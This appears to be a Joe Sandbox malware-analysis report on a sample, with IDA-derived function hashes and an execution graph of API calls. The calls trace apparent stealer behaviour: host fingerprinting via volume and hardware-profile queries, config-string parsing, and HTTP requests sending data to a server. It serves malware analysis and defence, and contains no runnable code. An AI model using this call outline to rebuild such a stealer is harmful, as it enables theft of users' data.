                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: vector<T> too long
                                                                                          • API String ID: 1785806476-3788999226
                                                                                          • Opcode ID: a1f1d6f9517dca1ff49c209d0a37899e3e77ac721eb36f06879cd4361368afc3
                                                                                          • Instruction ID: 8ac2e2bd70836d51d113e8c0c42fb79ba8b045d4607f88a9edd3ca9925ad1aef
                                                                                          • Opcode Fuzzy Hash: a1f1d6f9517dca1ff49c209d0a37899e3e77ac721eb36f06879cd4361368afc3
                                                                                          • Instruction Fuzzy Hash: F401F7B26046068FE324DFA9EC90E6BB3DCEF54214715492DE99BC3650E734F904CB60
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D064241
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D064277
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: vector<bool> too long
                                                                                          • API String ID: 1785806476-842332957
                                                                                          • Opcode ID: 2f0924f2af46b4c9f6fca52c3c7a1635cb2753940722bfbb170d5ed504f461bc
                                                                                          • Instruction ID: 9aa5a9682b167d5ac67f06b818ecdd23605a45b4033f2c7ada364efffcd526c8
                                                                                          • Opcode Fuzzy Hash: 2f0924f2af46b4c9f6fca52c3c7a1635cb2753940722bfbb170d5ed504f461bc
                                                                                          • Instruction Fuzzy Hash: E101FC716041066FE704CFA9DCE09BEF399FB84354FA1422EE51687640D730E918C7A0
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D063855
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D063880
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: vector<T> too long
                                                                                          • API String ID: 1785806476-3788999226
                                                                                          • Opcode ID: 737e81f11ff9b254ad1ae737865a76e4823c4f6d0cb172e44ac9d14ab66fff53
                                                                                          • Instruction ID: 08a77656eda84300ea0be13f6a97436f9286732a00a5e99b355a334e4e7432ae
                                                                                          • Opcode Fuzzy Hash: 737e81f11ff9b254ad1ae737865a76e4823c4f6d0cb172e44ac9d14ab66fff53
                                                                                          • Instruction Fuzzy Hash: 570188715047055FE314DFEDDC8496BB3D8EF44214715493DE59AD3650EA70F80487B0
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D015173
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D01519E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: vector<T> too long
                                                                                          • API String ID: 1785806476-3788999226
                                                                                          • Opcode ID: ec6cbdbc4a8b92c567b974f996ecdea623efa6333b3e6fe129d5fefd875ef93c
                                                                                          • Instruction ID: b58dc893e89d10c34a905ab80cf1be954893dba500a4ecae2a6a55d9e4b4d3a0
                                                                                          • Opcode Fuzzy Hash: ec6cbdbc4a8b92c567b974f996ecdea623efa6333b3e6fe129d5fefd875ef93c
                                                                                          • Instruction Fuzzy Hash: 0D01A2B16082069FE728CFE8DC95A7BB3E8EF54244715492DE95AC7640E731F800CB61
                                                                                          APIs
                                                                                            • Part of subcall function 6D06ABC3: __getptd.LIBCMT ref: 6D06ABC9
                                                                                            • Part of subcall function 6D06ABC3: __getptd.LIBCMT ref: 6D06ABD9
                                                                                          • __getptd.LIBCMT ref: 6D06BFC3
                                                                                            • Part of subcall function 6D06EAE6: __getptd_noexit.LIBCMT ref: 6D06EAE9
                                                                                            • Part of subcall function 6D06EAE6: __amsg_exit.LIBCMT ref: 6D06EAF6
                                                                                          • __getptd.LIBCMT ref: 6D06BFD1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                          • String ID: csm
                                                                                          • API String ID: 803148776-1018135373
                                                                                          • Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                                                                          • Instruction ID: ae1939e9455ef472c0a13b99787d349cd791d2e7cfcec62ecb80a078da02533e
                                                                                          • Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                                                                          • Instruction Fuzzy Hash: 140169388083868FFF248F61D444BADBBF5BF08311F61582EE1519A290DB389680DB69
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameName::
                                                                                          • String ID: {flat}
                                                                                          • API String ID: 1333004437-2606204563
                                                                                          • Opcode ID: 09be83cc4d112cd7796b035dde7f9321e61afdb8347b6a20b79c8690c5add182
                                                                                          • Instruction ID: 0fc4e7355ef4fa6a04141831fd63a82739c904627dc2a9da983a3a3526d1a693
                                                                                          • Opcode Fuzzy Hash: 09be83cc4d112cd7796b035dde7f9321e61afdb8347b6a20b79c8690c5add182
                                                                                          • Instruction Fuzzy Hash: 3DF0E5751442449FFB20CF58C060BBC3BA0DB4A355F09C145E96C0F283C731D442CB59
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,4E8A916F), ref: 6D0176AD
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,4E8A916F), ref: 6D0176FF
                                                                                          • EnterCriticalSection.KERNEL32(4E8A916F,?,?,?,4E8A916F), ref: 6D01770D
                                                                                          • LeaveCriticalSection.KERNEL32(4E8A916F,?,00000000,?,?,?,?,4E8A916F), ref: 6D01772A
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                            • Part of subcall function 6D016D40: _rand.LIBCMT ref: 6D016DEA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave$_malloc_rand
                                                                                          • String ID:
                                                                                          • API String ID: 119520971-0
                                                                                          • Opcode ID: 564ee9e9edd0872c34500dc8246fab25ef389cf36de2aa0a64a3ce9a758880f3
                                                                                          • Instruction ID: 2ef4564315551c62cb708b11fdb727b4428a52aefc5c908ef7e728bda24df605
                                                                                          • Opcode Fuzzy Hash: 564ee9e9edd0872c34500dc8246fab25ef389cf36de2aa0a64a3ce9a758880f3
                                                                                          • Instruction Fuzzy Hash: 7421C272908649EFDB00CF94CC44BEFB7BDFF85255F114629E92697640EB70AA05CBA0
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,4E8A916F), ref: 6D0176AD
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,4E8A916F), ref: 6D0176FF
                                                                                          • EnterCriticalSection.KERNEL32(4E8A916F,?,?,?,4E8A916F), ref: 6D01770D
                                                                                          • LeaveCriticalSection.KERNEL32(4E8A916F,?,00000000,?,?,?,?,4E8A916F), ref: 6D01772A
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                            • Part of subcall function 6D016D40: _rand.LIBCMT ref: 6D016DEA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave$_malloc_rand
                                                                                          • String ID:
                                                                                          • API String ID: 119520971-0
                                                                                          • Opcode ID: 27b90ba03753131606da40ef258364869acae7432bd2d30689e8b428d45edd7d
                                                                                          • Instruction ID: 8d550d48160a0252494552dccd5ec53f9a52d26dda1686c320010d596cf9f2e0
                                                                                          • Opcode Fuzzy Hash: 27b90ba03753131606da40ef258364869acae7432bd2d30689e8b428d45edd7d
                                                                                          • Instruction Fuzzy Hash: 5B21D472908649EFDB00CF94CC40FAFB7BDFF85255F114629E92697640EB70AA05CBA0
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?), ref: 6D0195A9
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6D0195CA
                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6D0195DA
                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6D0195FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3168844106-0
                                                                                          • Opcode ID: 669a3202d5e4e5dc6d0ae2c224168df533380c29afc0a9decbf9f6bee936cfc0
                                                                                          • Instruction ID: 9793253dcae3c8a5e3ac2af54c5c795e73483527ae5333091cf20a0aa02f17f2
                                                                                          • Opcode Fuzzy Hash: 669a3202d5e4e5dc6d0ae2c224168df533380c29afc0a9decbf9f6bee936cfc0
                                                                                          • Instruction Fuzzy Hash: 34117C32908109EFDB00CFD9E880EEEF7BDFF95214B11419AE525A7610D730EA51CBA0

                                                                                          Execution Graph

                                                                                          Execution Coverage:7.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:11.2%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:28
53383->54480 54481 4021af lstrcpy 53383->54481 54482 4021fd lstrcpy 53383->54482 54483 40224b lstrcpy 53383->54483 54488 4022d4 lstrcpy 53384->54488 53385->53383 53389 414235 53386->53389 53387->53383 53388 41428a 53400 413295 _EH_prolog 53388->53400 54484 402265 lstrcpy 53389->54484 53390->53383 53391->53383 53392->53383 53396 41423e 53401 40f9e1 lstrcpy 53396->53401 53397->53383 53398->53383 53399 414261 53399->53368 53402 41441b 53400->53402 53403 41424c 53401->53403 54478 401061 _EH_prolog 53402->54478 54485 4022ee lstrcpy 53403->54485 53405 414427 53412 4136b3 53405->53412 53406->53383 53407->53383 53409->53383 53410->53383 53411->53383 53413 40f9e1 lstrcpy 53412->53413 53414 4136c3 53413->53414 53415 40f9e1 lstrcpy 53414->53415 53416 4136cf 53415->53416 53417 40f9e1 lstrcpy 53416->53417 53418 4136db 53417->53418 53419 413295 _EH_prolog 53418->53419 53420 4132b5 53419->53420 53420->52520 53422 40f971 53421->53422 53423 40f986 53422->53423 53424 40f97e lstrcpy 53422->53424 53423->52527 53424->53423 53425->52537 53427 410516 GetVolumeInformationA 53426->53427 53428 41050f 53426->53428 53429 410546 53427->53429 53428->53427 53430 410578 GetProcessHeap HeapAlloc 53429->53430 53431 41059b wsprintfA lstrcat 53430->53431 53432 41058d 53430->53432 54498 4104a2 GetCurrentHwProfileA 53431->54498 53434 40f923 lstrcpy 53432->53434 53436 410596 53434->53436 53435 4105cb 53437 4105da lstrlenA 53435->53437 53436->52544 53438 4105ee 53437->53438 54502 411154 lstrcpy malloc strncpy 53438->54502 53440 4105f8 53441 410606 lstrcat 53440->53441 53442 410619 53441->53442 53443 40f923 lstrcpy 53442->53443 53444 41062a 53443->53444 53444->53436 53446 40f95a lstrcpy 53445->53446 53447 403b25 53446->53447 54503 403a54 _EH_prolog 53447->54503 53449 403b31 53450 40f923 lstrcpy 53449->53450 53451 403b4e 53450->53451 53452 40f923 lstrcpy 53451->53452 53453 403b61 53452->53453 53454 40f923 lstrcpy 53453->53454 53455 403b72 53454->53455 53456 40f923 lstrcpy 53455->53456 53457 403b83 
53456->53457 53458 40f923 lstrcpy 53457->53458 53459 403b94 53458->53459 53460 403ba4 InternetOpenA StrCmpCA 53459->53460 53461 403bc6 53460->53461 53462 404122 InternetCloseHandle 53461->53462 53463 410b5c 3 API calls 53461->53463 53476 404136 53462->53476 53464 403bdc 53463->53464 53465 40fa28 3 API calls 53464->53465 53466 403bef 53465->53466 53467 40f9e1 lstrcpy 53466->53467 53468 403bfc 53467->53468 53469 40fa9c 4 API calls 53468->53469 53470 403c25 53469->53470 53471 40f9e1 lstrcpy 53470->53471 53472 403c32 53471->53472 53473 40fa9c 4 API calls 53472->53473 53474 403c4f 53473->53474 53475 40f9e1 lstrcpy 53474->53475 53477 403c5c 53475->53477 53476->52547 53478 40fa28 3 API calls 53477->53478 53479 403c78 53478->53479 53480 40f9e1 lstrcpy 53479->53480 53481 403c85 53480->53481 53482 40fa9c 4 API calls 53481->53482 53483 403ca2 53482->53483 53484 40f9e1 lstrcpy 53483->53484 53485 403caf 53484->53485 53486 40fa9c 4 API calls 53485->53486 53487 403ccc 53486->53487 53488 40f9e1 lstrcpy 53487->53488 53489 403cd9 53488->53489 53490 40fa9c 4 API calls 53489->53490 53491 403cf7 53490->53491 53492 40fa28 3 API calls 53491->53492 53493 403d0a 53492->53493 53494 40f9e1 lstrcpy 53493->53494 53495 403d17 53494->53495 53496 403d2f InternetConnectA 53495->53496 53496->53462 53497 403d55 HttpOpenRequestA 53496->53497 53498 404119 InternetCloseHandle 53497->53498 53499 403d8e 53497->53499 53498->53462 53500 403d92 InternetSetOptionA 53499->53500 53501 403da8 53499->53501 53500->53501 53502 40fa9c 4 API calls 53501->53502 53503 403db9 53502->53503 53504 40f9e1 lstrcpy 53503->53504 53505 403dc6 53504->53505 53506 40fa28 3 API calls 53505->53506 53507 403de2 53506->53507 53508 40f9e1 lstrcpy 53507->53508 53509 403def 53508->53509 53510 40fa9c 4 API calls 53509->53510 53511 403e0c 53510->53511 53512 40f9e1 lstrcpy 53511->53512 53513 403e19 53512->53513 53514 40fa9c 4 API calls 53513->53514 53515 403e37 53514->53515 53516 40f9e1 lstrcpy 53515->53516 53517 403e44 53516->53517 53518 
40fa9c 4 API calls 53517->53518 53519 403e61 53518->53519 53520 40f9e1 lstrcpy 53519->53520 53521 403e6e 53520->53521 53522 40fa9c 4 API calls 53521->53522 53523 403e8b 53522->53523 53524 40f9e1 lstrcpy 53523->53524 53525 403e98 53524->53525 53526 40fa28 3 API calls 53525->53526 53527 403eb4 53526->53527 53528 40f9e1 lstrcpy 53527->53528 53529 403ec1 53528->53529 53530 40fa9c 4 API calls 53529->53530 53531 403ede 53530->53531 53532 40f9e1 lstrcpy 53531->53532 53533 403eeb 53532->53533 53534 40fa9c 4 API calls 53533->53534 53535 403f08 53534->53535 53536 40f9e1 lstrcpy 53535->53536 53537 403f15 53536->53537 53538 40fa28 3 API calls 53537->53538 53539 403f31 53538->53539 53540 40f9e1 lstrcpy 53539->53540 53541 403f3e 53540->53541 53542 40fa9c 4 API calls 53541->53542 53543 403f5b 53542->53543 53544 40f9e1 lstrcpy 53543->53544 53545 403f68 53544->53545 53546 40fa9c 4 API calls 53545->53546 53547 403f86 53546->53547 53548 40f9e1 lstrcpy 53547->53548 53549 403f93 53548->53549 53550 40fa9c 4 API calls 53549->53550 53551 403fb0 53550->53551 53552 40f9e1 lstrcpy 53551->53552 53553 403fbd 53552->53553 53554 40fa9c 4 API calls 53553->53554 53555 403fda 53554->53555 53556 40f9e1 lstrcpy 53555->53556 53557 403fe7 53556->53557 53558 40fa28 3 API calls 53557->53558 53559 404003 53558->53559 53560 40f9e1 lstrcpy 53559->53560 53561 404010 53560->53561 53562 40f923 lstrcpy 53561->53562 53563 404029 53562->53563 53564 40fa28 3 API calls 53563->53564 53565 40403d 53564->53565 53566 40fa28 3 API calls 53565->53566 53567 404050 53566->53567 53568 40f9e1 lstrcpy 53567->53568 53569 40405d 53568->53569 53570 40407d lstrlenA 53569->53570 53571 40408d 53570->53571 53572 404096 lstrlenA 53571->53572 54511 40fb4d 53572->54511 53574 4040a6 HttpSendRequestA 53575 4040ef InternetReadFile 53574->53575 53576 404106 InternetCloseHandle 53575->53576 53579 4040b5 53575->53579 54512 40f98e 53576->54512 53578 40fa9c 4 API calls 53578->53579 53579->53575 53579->53576 53579->53578 53580 40f9e1 lstrcpy 
53579->53580 53580->53579 54516 40fb4d 53581->54516 53583 411cfe StrCmpCA 53584 411d10 53583->53584 53585 411d09 ExitProcess 53583->53585 53586 411d20 strtok_s 53584->53586 53587 411e6d 53586->53587 53600 411d31 53586->53600 53587->52549 53588 411e52 strtok_s 53588->53587 53588->53600 53589 411d81 StrCmpCA 53589->53588 53589->53600 53590 411df1 StrCmpCA 53590->53588 53590->53600 53591 411d65 StrCmpCA 53591->53588 53591->53600 53592 411dc7 StrCmpCA 53592->53588 53592->53600 53593 411e06 StrCmpCA 53593->53588 53594 411d49 StrCmpCA 53594->53588 53594->53600 53595 411d9d StrCmpCA 53595->53588 53595->53600 53596 411ddc StrCmpCA 53596->53588 53596->53600 53597 411e1c StrCmpCA 53597->53588 53598 411e3e StrCmpCA 53598->53588 53599 40f997 2 API calls 53599->53600 53600->53588 53600->53589 53600->53590 53600->53591 53600->53592 53600->53593 53600->53594 53600->53595 53600->53596 53600->53597 53600->53598 53600->53599 53602 40f95a lstrcpy 53601->53602 53603 40517c 53602->53603 53604 403a54 6 API calls 53603->53604 53605 405188 53604->53605 53606 40f923 lstrcpy 53605->53606 53607 4051a5 53606->53607 53608 40f923 lstrcpy 53607->53608 53609 4051b8 53608->53609 53610 40f923 lstrcpy 53609->53610 53611 4051c9 53610->53611 53612 40f923 lstrcpy 53611->53612 53613 4051da 53612->53613 53614 40f923 lstrcpy 53613->53614 53615 4051eb 53614->53615 53616 4051fb InternetOpenA StrCmpCA 53615->53616 53617 40521d 53616->53617 53618 4058d8 InternetCloseHandle 53617->53618 53620 410b5c 3 API calls 53617->53620 53619 4058f3 53618->53619 54523 406242 CryptStringToBinaryA 53619->54523 53621 405233 53620->53621 53623 40fa28 3 API calls 53621->53623 53625 405246 53623->53625 53626 40f9e1 lstrcpy 53625->53626 53631 405253 53626->53631 53627 40f997 2 API calls 53628 40590c 53627->53628 53629 40fa9c 4 API calls 53628->53629 53630 40591a 53629->53630 53632 40f9e1 lstrcpy 53630->53632 53633 40fa9c 4 API calls 53631->53633 53638 405926 53632->53638 53634 40527c 53633->53634 53635 40f9e1 lstrcpy 53634->53635 
53636 405289 53635->53636 53637 40fa9c 4 API calls 53636->53637 53639 4052a6 53637->53639 53640 401061 _EH_prolog 53638->53640 53641 40f9e1 lstrcpy 53639->53641 53642 405984 53640->53642 53643 4052b3 53641->53643 53642->52555 53644 40fa28 3 API calls 53643->53644 53645 4052cf 53644->53645 53646 40f9e1 lstrcpy 53645->53646 53647 4052dc 53646->53647 53648 40fa9c 4 API calls 53647->53648 53649 4052f9 53648->53649 53650 40f9e1 lstrcpy 53649->53650 53651 405306 53650->53651 53652 40fa9c 4 API calls 53651->53652 53653 405323 53652->53653 53654 40f9e1 lstrcpy 53653->53654 53655 405330 53654->53655 53656 40fa9c 4 API calls 53655->53656 53657 40534e 53656->53657 53658 40fa28 3 API calls 53657->53658 53659 405361 53658->53659 53660 40f9e1 lstrcpy 53659->53660 53661 40536e 53660->53661 53662 405386 InternetConnectA 53661->53662 53662->53618 53663 4053ac HttpOpenRequestA 53662->53663 53664 4053e3 53663->53664 53665 4058cf InternetCloseHandle 53663->53665 53666 4053e7 InternetSetOptionA 53664->53666 53667 4053fd 53664->53667 53665->53618 53666->53667 53668 40fa9c 4 API calls 53667->53668 53669 40540e 53668->53669 53670 40f9e1 lstrcpy 53669->53670 53671 40541b 53670->53671 53672 40fa28 3 API calls 53671->53672 53673 405437 53672->53673 53674 40f9e1 lstrcpy 53673->53674 53675 405444 53674->53675 53676 40fa9c 4 API calls 53675->53676 53677 405461 53676->53677 53678 40f9e1 lstrcpy 53677->53678 53679 40546e 53678->53679 53680 40fa9c 4 API calls 53679->53680 53681 40548c 53680->53681 53682 40f9e1 lstrcpy 53681->53682 53683 405499 53682->53683 53684 40fa9c 4 API calls 53683->53684 53685 4054b7 53684->53685 53686 40f9e1 lstrcpy 53685->53686 53687 4054c4 53686->53687 53688 40fa9c 4 API calls 53687->53688 53689 4054e1 53688->53689 53690 40f9e1 lstrcpy 53689->53690 53691 4054ee 53690->53691 53692 40fa28 3 API calls 53691->53692 53693 40550a 53692->53693 53694 40f9e1 lstrcpy 53693->53694 53695 405517 53694->53695 53696 40fa9c 4 API calls 53695->53696 53697 405534 53696->53697 53698 40f9e1 
lstrcpy 53697->53698 53699 405541 53698->53699 53700 40fa9c 4 API calls 53699->53700 53701 40555e 53700->53701 53702 40f9e1 lstrcpy 53701->53702 53703 40556b 53702->53703 53704 40fa28 3 API calls 53703->53704 53705 405587 53704->53705 53706 40f9e1 lstrcpy 53705->53706 53707 405594 53706->53707 53708 40fa9c 4 API calls 53707->53708 53709 4055b1 53708->53709 53710 40f9e1 lstrcpy 53709->53710 53711 4055be 53710->53711 53712 40fa9c 4 API calls 53711->53712 53713 4055dc 53712->53713 53714 40f9e1 lstrcpy 53713->53714 53715 4055e9 53714->53715 53716 40fa9c 4 API calls 53715->53716 53717 405606 53716->53717 53718 40f9e1 lstrcpy 53717->53718 53719 405613 53718->53719 53720 40fa9c 4 API calls 53719->53720 53721 405630 53720->53721 53722 40f9e1 lstrcpy 53721->53722 53723 40563d 53722->53723 53724 40fa9c 4 API calls 53723->53724 53725 40565b 53724->53725 53726 40f9e1 lstrcpy 53725->53726 53727 405668 53726->53727 53728 40fa9c 4 API calls 53727->53728 53729 405685 53728->53729 53730 40f9e1 lstrcpy 53729->53730 53731 405692 53730->53731 53732 40fa9c 4 API calls 53731->53732 53733 4056af 53732->53733 53734 40f9e1 lstrcpy 53733->53734 53735 4056bc 53734->53735 53736 40fa28 3 API calls 53735->53736 53737 4056d8 53736->53737 53738 40f9e1 lstrcpy 53737->53738 53739 4056e5 53738->53739 53740 40fa9c 4 API calls 53739->53740 53741 405702 53740->53741 53742 40f9e1 lstrcpy 53741->53742 53743 40570f 53742->53743 53744 40fa9c 4 API calls 53743->53744 53745 40572d 53744->53745 53746 40f9e1 lstrcpy 53745->53746 53747 40573a 53746->53747 53748 40fa9c 4 API calls 53747->53748 53749 405757 53748->53749 53750 40f9e1 lstrcpy 53749->53750 53751 405764 53750->53751 53752 40fa9c 4 API calls 53751->53752 53753 405781 53752->53753 53754 40f9e1 lstrcpy 53753->53754 53755 40578e 53754->53755 53756 40fa28 3 API calls 53755->53756 53757 4057aa 53756->53757 53758 40f9e1 lstrcpy 53757->53758 53759 4057b7 53758->53759 53760 4057cb lstrlenA 53759->53760 54517 40fb4d 53760->54517 53762 4057dc lstrlenA 
GetProcessHeap HeapAlloc 54518 40fb4d 53762->54518 53764 4057fe lstrlenA 54519 40fb4d 53764->54519 53766 40580e memcpy 54520 40fb4d 53766->54520 53768 405820 lstrlenA 53769 405830 53768->53769 53770 405839 lstrlenA memcpy 53769->53770 54521 40fb4d 53770->54521 53772 405855 lstrlenA 54522 40fb4d 53772->54522 53774 405865 HttpSendRequestA 53775 4058b1 InternetReadFile 53774->53775 53776 4058c8 InternetCloseHandle 53775->53776 53778 405877 53775->53778 53776->53665 53777 40fa9c 4 API calls 53777->53778 53778->53775 53778->53776 53778->53777 53779 40f9e1 lstrcpy 53778->53779 53779->53778 54528 40fb4d 53780->54528 53782 411740 strtok_s 53783 4117a9 53782->53783 53784 41174d 53782->53784 53783->52557 53785 411792 strtok_s 53784->53785 53786 40f997 2 API calls 53784->53786 53787 40f997 2 API calls 53784->53787 53785->53783 53785->53784 53786->53785 53787->53784 54529 40fb4d 53788->54529 53790 41151d strtok_s 53791 41162e 53790->53791 53792 41152e 53790->53792 53791->52565 53793 4115df StrCmpCA 53792->53793 53794 40f997 2 API calls 53792->53794 53795 411611 strtok_s 53792->53795 53796 4115ae StrCmpCA 53792->53796 53797 411589 StrCmpCA 53792->53797 53798 41155b StrCmpCA 53792->53798 53793->53792 53794->53795 53795->53791 53795->53792 53796->53792 53797->53792 53798->53792 54530 40fb4d 53799->54530 53801 411674 strtok_s 53802 411681 53801->53802 53803 4116fa 53801->53803 53804 4116ab StrCmpCA 53802->53804 53805 40f997 2 API calls 53802->53805 53806 4116e3 strtok_s 53802->53806 53807 40f997 2 API calls 53802->53807 53803->52573 53804->53802 53805->53806 53806->53802 53806->53803 53807->53802 53809 40f923 lstrcpy 53808->53809 53810 414625 53809->53810 53811 40fa9c 4 API calls 53810->53811 53812 41463a 53811->53812 53813 40f9e1 lstrcpy 53812->53813 53814 414647 53813->53814 53815 40fa9c 4 API calls 53814->53815 53816 414665 53815->53816 53817 40f9e1 lstrcpy 53816->53817 53818 414672 53817->53818 53819 40fa9c 4 API calls 53818->53819 53820 41468f 53819->53820 53821 40f9e1 
lstrcpy 53820->53821 53822 41469c 53821->53822 53823 40fa9c 4 API calls 53822->53823 53824 4146b9 53823->53824 53825 40f9e1 lstrcpy 53824->53825 53826 4146c6 53825->53826 53827 40fa9c 4 API calls 53826->53827 53828 4146e3 53827->53828 53829 40f9e1 lstrcpy 53828->53829 53830 4146f0 53829->53830 54531 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 53830->54531 53832 414701 53833 40fa9c 4 API calls 53832->53833 53834 41470e 53833->53834 53835 40f9e1 lstrcpy 53834->53835 53836 41471b 53835->53836 53837 40fa9c 4 API calls 53836->53837 53838 414738 53837->53838 53839 40f9e1 lstrcpy 53838->53839 53840 414745 53839->53840 53841 40fa9c 4 API calls 53840->53841 53842 414762 53841->53842 53843 40f9e1 lstrcpy 53842->53843 53844 41476f 53843->53844 54532 410415 memset RegOpenKeyExA 53844->54532 53846 414780 53847 40fa9c 4 API calls 53846->53847 53848 41478d 53847->53848 53849 40f9e1 lstrcpy 53848->53849 53850 41479a 53849->53850 53851 40fa9c 4 API calls 53850->53851 53852 4147b7 53851->53852 53853 40f9e1 lstrcpy 53852->53853 53854 4147c4 53853->53854 53855 40fa9c 4 API calls 53854->53855 53856 4147e1 53855->53856 53857 40f9e1 lstrcpy 53856->53857 53858 4147ee 53857->53858 53859 4104a2 2 API calls 53858->53859 53860 414803 53859->53860 53861 40fa28 3 API calls 53860->53861 53862 414815 53861->53862 53863 40f9e1 lstrcpy 53862->53863 53864 414822 53863->53864 53865 40fa9c 4 API calls 53864->53865 53866 41484b 53865->53866 53867 40f9e1 